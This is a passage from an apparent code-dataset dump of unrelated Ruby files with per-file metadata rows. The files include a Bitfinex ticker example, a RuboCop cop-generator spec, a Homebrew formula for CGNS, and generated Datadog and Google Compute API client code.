    # TODO: print the list of available commands (original branch was
    # empty as well).
  end
end
| 19.651376 | 72 | 0.630719 |
33f664cbafccc81837a600e52a113a7007106ba3 | 237 | require_relative '../../../lib/bitfinex.rb'
# Example: build a REST v2 client from environment-supplied connection
# settings and print the ticker for the tBTCUSD trading pair and the
# fUSD funding currency.
config = {
  url: ENV['REST_URL'],
  proxy: ENV['PROXY'],
  api_key: ENV['API_KEY'],
  api_secret: ENV['API_SECRET']
}
client = Bitfinex::RESTv2.new(config)
puts client.ticker('tBTCUSD', 'fUSD')
| 21.545455 | 43 | 0.616034 |
3364e31e3403e1741b5131de602c8e37794c215b | 235 | class Survey::ResponseSerializer < ActiveModel::Serializer
attributes :id, :lock_version, :survey_submission_id,
:survey_question_id,
:response, :fuuid
# TODO: test that response comes back ok as JSON
end
| 33.571429 | 58 | 0.702128 |
034ce9167b77ac2aea9fc8db9b8d71a6578a7a5f | 3,630 | # frozen_string_literal: true
require 'yaml'
require 'erb'
# data files
TOKEN_SEQ_FILE_LIST = [
'stdacl_token_seq.yml',
'extacl_token_seq.yml'
# 'extacl_objgrp_token_seq.yml'
].freeze
# return spec conf dir
# Path of +file+ under the spec configuration directory.
def _spec_conf_dir(file)
  # Dir.new is kept (instead of a bare File.join) so a missing
  # ./spec/conf/ directory still fails fast with Errno::ENOENT.
  File.join(Dir.new('./spec/conf/').path, file)
end

# Path of +file+ under the spec data directory.
def _spec_data_dir(file)
  File.join(Dir.new('./spec/data/').path, file)
end
# Expand the token patterns for the given field sequence into concrete
# test cases. NOTE: destructively consumes +fields+ via #shift, exactly
# like the original implementation.
def gen_testcase(tokens, fields)
  # Base case: a single neutral, valid "empty" case to combine against.
  return [{ data: '', msg: '', valid: true }] if fields.empty?

  head = fields.shift
  patterns_for_head = tokens[head.intern]
  # Recurse over the remaining fields, then pair every pattern of the
  # head field with every combination produced by the tail.
  create_data(patterns_for_head, gen_testcase(tokens, fields))
end

# Combine each head-field pattern with each tail combination.
# Pairs where BOTH sides are invalid are dropped, so every generated
# case contains at most one failing field.
def create_data(field_patterns, leftover_results)
  field_patterns.flat_map do |pattern|
    leftover_results
      .select { |rest| pattern[:valid] || rest[:valid] }
      .map { |rest| single_data(pattern, rest) }
  end
end

# Merge one pattern and one tail combination into a single test case.
# Because only single-fault pairs reach this point, the failing side's
# message (if any) is the case's message.
def single_data(curr, leftover)
  combined = [curr[:data], leftover[:data]].join(' ')
  {
    data: combined,
    msg: curr[:msg] || leftover[:msg],
    valid: curr[:valid] && leftover[:valid]
  }
end
# Iterate over every test-definition entry in every token-sequence
# config file, yielding one entry hash at a time.
# Each entry is expected to carry :testname, :casedata and :fieldseq
# keys (see the callers below).
def each_test
  TOKEN_SEQ_FILE_LIST.each do |each_file|
    token_seq_data = YAML.load_file(_spec_conf_dir(each_file))
    token_seq_data.each do |each|
      puts "Test Name: #{each[:testname]}"
      puts "Test Case File: #{each[:casedata]}"
      yield(each)
    end
  end
end
##############################
# Phase 1: expand every token-sequence definition into concrete test
# case data and dump it as YAML under the spec data directory.
puts '## generate test case data file'
each_test do |each|
  # read tokens pattern data
  tokens = YAML.load_file(_spec_conf_dir(each[:casedata]))
  # generate test case data (cartesian expansion of the field sequence)
  testcase_list = gen_testcase(tokens, each[:fieldseq])
  # write datafile, named <testname>.yml
  case_file_base = [each[:testname], '.yml'].join
  puts "Test Case Data: #{case_file_base}"
  case_file = _spec_data_dir(case_file_base)
  File.open(case_file, 'w') do |file|
    file.puts YAML.dump(testcase_list.flatten)
  end
end
##############################
# Phase 2: render one RSpec source file per test definition from the
# ERB template stored after __END__ (available via the DATA handle).
code_data = DATA.read
puts '## generate spec code'
each_test do |each|
  spec_file_base = "#{each[:testname]}.rb"
  puts "Spec code Data: #{spec_file_base}"
  File.open(_spec_data_dir(spec_file_base), 'w') do |file|
    # Fix: ERB.new(str, nil, '-') used the legacy positional
    # safe_level/trim_mode arguments, deprecated in Ruby 2.6 and
    # removed in Ruby 3.2. The keyword form is equivalent ('-' enables
    # <%- and -%> trim markers) and works on all supported Rubies.
    code_erb = ERB.new(code_data, trim_mode: '-')
    file.puts code_erb.result(binding)
  end
end
__END__
# -*- coding: utf-8 -*-
require 'spec_helper'
require 'stringio'
describe 'Parser' do
describe '#parse_string' do
before do
@parser = CiscoAclIntp::Parser.new(color: false, silent: true)
end
<%-
tests = YAML.load_file(_spec_data_dir(each[:testname] + '.yml'))
test_total = tests.length
test_curr = 1
tests.each do |t|
now = sprintf(
"%d/%.1f\%", test_curr, (100.0 * test_curr / test_total)
)
if t[:valid]
-%>
it 'should be parsed acl [<%= now %>]: <%= t[:data] %>' do
datastr = '<%= t[:data] %>'
@parser.parse_string(datastr)
expect(@parser.contains_error?).to be_falsey
end
<%-
else
-%>
it 'should not be parsed acl [<%= now %>]: <%= t[:data] %>' do
datastr = StringIO.new('<%= t[:data] %>', 'r')
@parser.parse_file(datastr)
expect(@parser.contains_error?).to be_truthy
end
<%-
end
test_curr = test_curr + 1
end
-%>
end # describe parse_file
end # describe Parser
| 24.693878 | 68 | 0.654821 |
ed327938c5d2c984523a1a3674abdf91b1398c8e | 90 | json.extract! @survey, :id, :name, :company_id, :section, :text, :created_at, :updated_at
| 45 | 89 | 0.711111 |
18c9082affa1af9e995c6dfa19ad57339878d150 | 7,564 | =begin
#Datadog API V2 Collection
#Collection of all Datadog Public endpoints.
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
This product includes software developed at Datadog (https://www.datadoghq.com/).
Copyright 2020-Present Datadog, Inc.
=end
require 'date'
require 'time'
module DatadogAPIClient::V2
# Object containing the definition of a metric's ingested and indexed volume.
class MetricIngestedIndexedVolumeAttributes
# whether the object has unparsed attributes
attr_accessor :_unparsed
# Indexed volume for the given metric.
attr_accessor :indexed_volume
# Ingested volume for the given metric.
attr_accessor :ingested_volume
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'indexed_volume' => :'indexed_volume',
:'ingested_volume' => :'ingested_volume'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'indexed_volume' => :'Integer',
:'ingested_volume' => :'Integer'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V2::MetricIngestedIndexedVolumeAttributes` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V2::MetricIngestedIndexedVolumeAttributes`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'indexed_volume')
self.indexed_volume = attributes[:'indexed_volume']
end
if attributes.key?(:'ingested_volume')
self.ingested_volume = attributes[:'ingested_volume']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
indexed_volume == o.indexed_volume &&
ingested_volume == o.ingested_volume
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[indexed_volume, ingested_volume].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when :Array
# generic array, return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = DatadogAPIClient::V2.const_get(type)
res = klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
if res.instance_of? DatadogAPIClient::V2::UnparsedObject
self._unparsed = true
end
res
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Serialize a single attribute value for #to_hash.
# Arrays and Hashes are walked recursively (nil entries are stripped
# from Arrays only); any object exposing #to_hash is converted; every
# other value passes through unchanged.
# @param [Object] value Any valid value
# @return [Object] the hash-friendly representation of the value
def _to_hash(value)
  case value
  when Array
    value.compact.map { |element| _to_hash(element) }
  when Hash
    value.each_with_object({}) do |(key, inner), out|
      out[key] = _to_hash(inner)
    end
  else
    value.respond_to?(:to_hash) ? value.to_hash : value
  end
end
end
| 31 | 237 | 0.640534 |
618ea5be1f191ae9f8a5dd0b7a5a5c602765454d | 9,270 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Generator do
  subject(:generator) do
    described_class.new(cop_identifier, 'your_id', output: stdout)
  end

  # NOTE(review): HOME_DIR is assigned but never referenced in this spec —
  # presumably a leftover; confirm before removing.
  HOME_DIR = Dir.pwd

  let(:stdout) { StringIO.new }
  let(:cop_identifier) { 'Style/FakeCop' }

  before do
    # Stub File.write globally so generated files are never written to disk.
    allow(File).to receive(:write)
  end

  describe '#write_source' do
    include_context 'cli spec behavior'

    it 'generates a helpful source file with the name filled in' do
      generated_source = <<~RUBY
        # frozen_string_literal: true

        # TODO: when finished, run `rake generate_cops_documentation` to update the docs
        module RuboCop
          module Cop
            module Style
              # TODO: Write cop description and example of bad / good code. For every
              # `SupportedStyle` and unique configuration, there needs to be examples.
              # Examples must have valid Ruby syntax. Do not use upticks.
              #
              # @example EnforcedStyle: bar (default)
              #   # Description of the `bar` style.
              #
              #   # bad
              #   bad_bar_method
              #
              #   # bad
              #   bad_bar_method(args)
              #
              #   # good
              #   good_bar_method
              #
              #   # good
              #   good_bar_method(args)
              #
              # @example EnforcedStyle: foo
              #   # Description of the `foo` style.
              #
              #   # bad
              #   bad_foo_method
              #
              #   # bad
              #   bad_foo_method(args)
              #
              #   # good
              #   good_foo_method
              #
              #   # good
              #   good_foo_method(args)
              #
              class FakeCop < Cop
                # TODO: Implement the cop in here.
                #
                # In many cases, you can use a node matcher for matching node pattern.
                # See https://github.com/rubocop-hq/rubocop/blob/master/lib/rubocop/node_pattern.rb
                #
                # For example
                MSG = 'Use `#good_method` instead of `#bad_method`.'

                def_node_matcher :bad_method?, <<~PATTERN
                  (send nil? :bad_method ...)
                PATTERN

                def on_send(node)
                  return unless bad_method?(node)

                  add_offense(node)
                end
              end
            end
          end
        end
      RUBY

      expect(File)
        .to receive(:write)
        .with('lib/rubocop/cop/style/fake_cop.rb', generated_source)

      generator.write_source

      expect(stdout.string)
        .to eq("[create] lib/rubocop/cop/style/fake_cop.rb\n")
    end

    it 'refuses to overwrite existing files' do
      new_cop = described_class.new('Layout/Tab', 'your_id')

      allow(new_cop).to receive(:exit!)
      expect { new_cop.write_source }
        .to output(
          "rake new_cop: lib/rubocop/cop/layout/tab.rb already exists!\n"
        ).to_stderr
    end
  end

  describe '#write_spec' do
    include_context 'cli spec behavior'

    it 'generates a helpful starting spec file with the class filled in' do
      generated_source = <<~SPEC
        # frozen_string_literal: true

        RSpec.describe RuboCop::Cop::Style::FakeCop do
          subject(:cop) { described_class.new(config) }

          let(:config) { RuboCop::Config.new }

          # TODO: Write test code
          #
          # For example
          it 'registers an offense when using `#bad_method`' do
            expect_offense(<<~RUBY)
              bad_method
              ^^^^^^^^^^ Use `#good_method` instead of `#bad_method`.
            RUBY
          end

          it 'does not register an offense when using `#good_method`' do
            expect_no_offenses(<<~RUBY)
              good_method
            RUBY
          end
        end
      SPEC

      expect(File)
        .to receive(:write)
        .with('spec/rubocop/cop/style/fake_cop_spec.rb', generated_source)

      generator.write_spec
    end

    it 'refuses to overwrite existing files' do
      new_cop = described_class.new('Layout/Tab', 'your_id')

      allow(new_cop).to receive(:exit!)
      expect { new_cop.write_spec }
        .to output(
          "rake new_cop: spec/rubocop/cop/layout/tab_spec.rb already exists!\n"
        ).to_stderr
    end
  end

  describe '#todo' do
    it 'provides a checklist for implementing the cop' do
      expect(generator.todo).to eql(<<~TODO)
        Do 3 steps:
          1. Add an entry to the "New features" section in CHANGELOG.md,
             e.g. "Add new `Style/FakeCop` cop. ([@your_id][])"
          2. Modify the description of Style/FakeCop in config/default.yml
          3. Implement your new cop in the generated file!
      TODO
    end
  end

  describe '.new' do
    it 'does not accept an unqualified cop' do
      expect { described_class.new('FakeCop', 'your_id') }
        .to raise_error(ArgumentError)
        .with_message('Specify a cop name with Department/Name style')
    end
  end

  describe '#inject_config' do
    let(:path) { @path } # rubocop:disable RSpec/InstanceVariable

    around do |example|
      # Give each example its own throwaway config file, cleaned up by
      # Tempfile.create when the block exits.
      Tempfile.create('rubocop-config.yml') do |file|
        @path = file.path
        example.run
      end
    end

    before do
      IO.write(path, <<~YAML)
        Style/Alias:
          Enabled: true
        Style/Lambda:
          Enabled: true
        Style/SpecialGlobalVars:
          Enabled: true
      YAML
      # Pin the version so the generated VersionAdded value is deterministic.
      stub_const('RuboCop::Version::STRING', '0.58.2')
    end

    context 'when it is the middle in alphabetical order' do
      it 'inserts the cop' do
        expect(File).to receive(:write).with(path, <<~YAML)
          Style/Alias:
            Enabled: true
          Style/FakeCop:
            Description: 'TODO: Write a description of the cop.'
            Enabled: pending
            VersionAdded: '0.59'
          Style/Lambda:
            Enabled: true
          Style/SpecialGlobalVars:
            Enabled: true
        YAML

        generator.inject_config(config_file_path: path)

        expect(stdout.string)
          .to eq('[modify] A configuration for the cop is added into ' \
                 "#{path}.\n")
      end
    end

    context 'when it is the first in alphabetical order' do
      let(:cop_identifier) { 'Style/Aaa' }

      it 'inserts the cop' do
        expect(File).to receive(:write).with(path, <<~YAML)
          Style/Aaa:
            Description: 'TODO: Write a description of the cop.'
            Enabled: pending
            VersionAdded: '0.59'
          Style/Alias:
            Enabled: true
          Style/Lambda:
            Enabled: true
          Style/SpecialGlobalVars:
            Enabled: true
        YAML

        generator.inject_config(config_file_path: path)

        expect(stdout.string)
          .to eq('[modify] A configuration for the cop is added into ' \
                 "#{path}.\n")
      end
    end

    context 'when it is the last in alphabetical order' do
      let(:cop_identifier) { 'Style/Zzz' }

      it 'inserts the cop' do
        expect(File).to receive(:write).with(path, <<~YAML)
          Style/Alias:
            Enabled: true
          Style/Lambda:
            Enabled: true
          Style/SpecialGlobalVars:
            Enabled: true
          Style/Zzz:
            Description: 'TODO: Write a description of the cop.'
            Enabled: pending
            VersionAdded: '0.59'
        YAML

        generator.inject_config(config_file_path: path)

        expect(stdout.string)
          .to eq('[modify] A configuration for the cop is added into ' \
                 "#{path}.\n")
      end
    end
  end

  describe '#snake_case' do
    it 'converts "Lint" to snake_case' do
      expect(generator.__send__(:snake_case, 'Lint')).to eq('lint')
    end

    it 'converts "FooBar" to snake_case' do
      expect(generator.__send__(:snake_case, 'FooBar')).to eq('foo_bar')
    end

    it 'converts "RSpec" to snake_case' do
      expect(generator.__send__(:snake_case, 'RSpec')).to eq('rspec')
    end
  end

  describe 'compliance with rubocop', :isolated_environment do
    include FileHelper

    around do |example|
      # Shrink the cop registry to a single internal cop so running RuboCop
      # over the generated files is fast and deterministic, then restore it.
      orig_registry = RuboCop::Cop::Cop.registry
      RuboCop::Cop::Cop.instance_variable_set(
        :@registry,
        RuboCop::Cop::Registry.new(
          [RuboCop::Cop::InternalAffairs::NodeDestructuring]
        )
      )
      example.run
      RuboCop::Cop::Cop.instance_variable_set(:@registry, orig_registry)
    end

    let(:config) do
      config = RuboCop::ConfigStore.new
      path = File.join(RuboCop::ConfigLoader::RUBOCOP_HOME,
                       RuboCop::ConfigLoader::DOTFILE)
      config.options_config = path
      config
    end
    let(:options) { { formatters: [] } }
    let(:runner) { RuboCop::Runner.new(options, config) }

    it 'generates a cop file that has no offense' do
      generator.write_source

      expect(runner.run([])).to be true
    end

    it 'generates a spec file that has no offense' do
      generator.write_spec

      expect(runner.run([])).to be true
    end
  end
end
| 27.837838 | 99 | 0.558037 |
38a3132b702f5a7463ba0d6f529b48d628a3dc00 | 1,025 | module HealthSeven::V2_3_1
# HL7 v2.3.1 SUR^P09 message (per the HL7 standard, the summary product
# experience report). Declaratively maps the message's segment groups onto
# typed attributes via the HealthSeven `attribute` DSL.
class SurP09 < ::HealthSeven::Message
  # MSH: message header segment (required).
  attribute :msh, Msh, position: "MSH", require: true

  # One FACILITY group per reporting facility.
  class Facility < ::HealthSeven::SegmentGroup
    # FAC: facility segment (required).
    attribute :fac, Fac, position: "FAC", require: true

    # PRODUCT group: PSH (product summary header) + PDC (product detail country).
    class Product < ::HealthSeven::SegmentGroup
      attribute :psh, Psh, position: "PSH", require: true
      attribute :pdc, Pdc, position: "PDC", require: true
    end
    attribute :products, Array[Product], position: "SUR_P09.PRODUCT", require: true, multiple: true
    attribute :psh, Psh, position: "PSH", require: true

    # FACILITY_DETAIL group: FAC + PDC + NTE (notes and comments).
    class FacilityDetail < ::HealthSeven::SegmentGroup
      attribute :fac, Fac, position: "FAC", require: true
      attribute :pdc, Pdc, position: "PDC", require: true
      attribute :nte, Nte, position: "NTE", require: true
    end
    attribute :facility_details, Array[FacilityDetail], position: "SUR_P09.FACILITY_DETAIL", require: true, multiple: true
  end
  attribute :facilities, Array[Facility], position: "SUR_P09.FACILITY", require: true, multiple: true
end
end | 48.809524 | 122 | 0.707317 |
b97552f04d9b8a8eabb8a4f1373d966f4acc7776 | 2,173 | class Cgns < Formula
desc "CFD General Notation System"
homepage "http://cgns.org/"
url "https://github.com/CGNS/CGNS/archive/v4.1.2.tar.gz"
sha256 "951653956f509b8a64040f1440c77f5ee0e6e2bf0a9eef1248d370f60a400050"
license "BSD-3-Clause"
head "https://github.com/CGNS/CGNS.git"
livecheck do
url :head
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
cellar :any
sha256 "e2e5eb665f0f5c94c7782f0aed3708124705792ff5a7adf945a537369db6d724" => :big_sur
sha256 "abc3326bddbf58509b5ffb3834d68836ad803abf83f9958ae6a012870e7e9f85" => :arm64_big_sur
sha256 "4371c695cad1aa0bccbaaf0deccb9a8f5ddf7271dcbbddf6307b8d0bc254cec5" => :catalina
sha256 "d9904ca7c839a5d0421b99ba784e98fec047971de47efa5d3cc00725cd892e26" => :mojave
sha256 "8bfeb33c22f79c998b31fea6aafc60aecf2edf18ea754799c67c012d90555ec9" => :high_sierra
sha256 "3aca3463b3f007445d8d8f3d380b06e619fca591406f540ac56d8e08b20e2f54" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "gcc"
depends_on "hdf5"
depends_on "szip"
uses_from_macos "zlib"
def install
args = std_cmake_args + %w[
-DCGNS_ENABLE_64BIT=YES
-DCGNS_ENABLE_FORTRAN=YES
-DCGNS_ENABLE_HDF5=YES
]
mkdir "build" do
system "cmake", "..", *args
system "make"
system "make", "install"
end
# Avoid references to Homebrew shims
os = OS.mac? ? "mac" : "linux"
cc = OS.mac? ? "clang" : "gcc-5"
inreplace include/"cgnsBuild.defs", HOMEBREW_LIBRARY/"Homebrew/shims/#{os}/super/#{cc}", "/usr/bin/#{cc}"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include "cgnslib.h"
int main(int argc, char *argv[])
{
int filetype = CG_FILE_NONE;
if (cg_is_cgns(argv[0], &filetype) != CG_ERROR)
return 1;
return 0;
}
EOS
system Formula["hdf5"].opt_prefix/"bin/h5cc", testpath/"test.c", "-L#{opt_lib}", "-lcgns",
*("-Wl,-rpath=#{Formula["szip"].opt_lib}" unless OS.mac?),
*("-Wl,-rpath=#{lib}" unless OS.mac?)
system "./a.out"
end
end
| 31.955882 | 109 | 0.64381 |
ed5bce196582810062a2cd397140ea69455136e8 | 50,567 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_pb"
require "google/cloud/compute/v1/url_maps/rest/service_stub"
module Google
module Cloud
module Compute
module V1
module UrlMaps
module Rest
##
# REST client for the UrlMaps service.
#
# The UrlMaps API.
#
class Client
# @private
attr_reader :url_maps_stub
##
# Configure the UrlMaps Client class.
#
# See {::Google::Cloud::Compute::V1::UrlMaps::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all UrlMaps clients:
#
# ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
  @configure ||= begin
    # Walk outward through the enclosing namespaces (V1 -> Compute -> Cloud
    # -> Google) looking for the nearest ancestor module that responds to
    # `configure`; its configuration becomes the parent of this client's.
    namespace = ["Google", "Cloud", "Compute", "V1"]
    parent_config = while namespace.any?
                      parent_name = namespace.join "::"
                      parent_const = const_get parent_name
                      # `while` evaluates to the value given to `break`, or
                      # nil when no configurable ancestor is found.
                      break parent_const.configure if parent_const.respond_to? :configure

                      namespace.pop
                    end
    default_config = Client::Configuration.new parent_config
    default_config
  end
  yield @configure if block_given?
  @configure
end
##
# Configure the UrlMaps Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::UrlMaps::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
  # Let the caller tweak the derived configuration in place, then return it.
  if block_given?
    yield @config
  end
  @config
end
##
# Create a new UrlMaps REST client object.
#
# ## Examples
#
# To create a new UrlMaps REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.new
#
# To create a new UrlMaps REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the UrlMaps client.
# @yieldparam config [Client::Configuration]
#
def initialize
  # Create the configuration object
  @config = Configuration.new Client.configure

  # Yield the configuration if needed
  yield @config if block_given?

  # Create credentials
  credentials = @config.credentials
  credentials ||= Credentials.default scope: @config.scope
  # A String or Hash credential is presumably a keyfile path / parsed
  # keyfile contents (googleauth convention) — wrap it in a Credentials
  # object before handing it to the transport. TODO(review): confirm.
  if credentials.is_a?(::String) || credentials.is_a?(::Hash)
    credentials = Credentials.new credentials, scope: @config.scope
  end

  # Build the REST transport stub that performs the actual HTTP calls.
  @url_maps_stub = ::Google::Cloud::Compute::V1::UrlMaps::Rest::ServiceStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Retrieves the list of all UrlMap resources, regional and global, available to the specified project.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Name of the project scoping this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Gapic::Rest::PagedEnumerable<::String, ::Google::Cloud::Compute::V1::UrlMapsScopedList>]
# @yieldparam response [::Faraday::Response]
#
# @return [::Gapic::Rest::PagedEnumerable<::String, ::Google::Cloud::Compute::V1::UrlMapsScopedList>]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def aggregated_list request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest

  # Converts hash and nil to an options object
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Customize the options with defaults
  call_metadata = {}

  # Set x-goog-api-client header
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Compute::V1::VERSION,
    transports_version_send: [:rest]

  options.apply_defaults timeout: @config.timeout,
                         metadata: call_metadata

  @url_maps_stub.aggregated_list request, options do |result, response|
    # Wrap the raw response so callers can enumerate across pages lazily.
    result = ::Gapic::Rest::PagedEnumerable.new @url_maps_stub, :aggregated_list, "items", request, result, options
    yield result, response if block_given?
    # `return` (not `next`) intentionally exits the whole method with the
    # result, even when a caller-supplied block was given.
    return result
  end
rescue ::Faraday::Error => e
  # Translate transport-level Faraday failures into the canonical
  # Google::Cloud::Error hierarchy.
  gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
  raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified UrlMap resource.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteUrlMapRequest} or an equivalent Hash.
